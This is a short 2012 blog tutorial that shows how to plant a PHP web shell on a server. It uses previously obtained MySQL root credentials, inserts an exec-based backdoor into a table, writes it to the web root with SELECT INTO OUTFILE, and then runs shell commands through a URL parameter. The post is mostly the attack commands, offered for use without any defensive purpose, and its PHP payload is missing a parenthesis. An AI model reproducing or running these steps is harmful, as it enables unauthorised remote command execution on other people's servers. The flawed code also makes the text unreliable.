Saturday, 15 September 2012

Generate Backdoor via SQL Injection

Posted by at 07:25 Read our previous post
After the previous post about Extracting data from Database Server and get the mysql user,password we will learn how to generate backdoor using SQL Injection.

user and password that we get from the previous post is username : root and password : root.
So we can use it for login into system using this command:
mysql -u root -p

You will sign in into mysql command line.
Time for generate backdoor....
Create database pwn
create database pwn;
Use database pwn;
user pwn;
Create table backdoor
create table backdoor(script text);
Insert Backdoor script / PHP Script
insert into backdoor(script) values("<?php echo exec($_GET['cmd'];?>");
Create backdoor into file, but you should know where the web server directory.
We can knowing it from the error when we do an attack before
In the column file, we know that the path of web server is /var/www/
So we can save the backdoor here /var/www/
ok lets do that
select * into outfile "/var/www/backdoor.php" from backdoor;

If not success, make sure the path permission is writeable.
Now, access your backdoor here
http://localhost/backdoor.php?cmd=uname -a

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template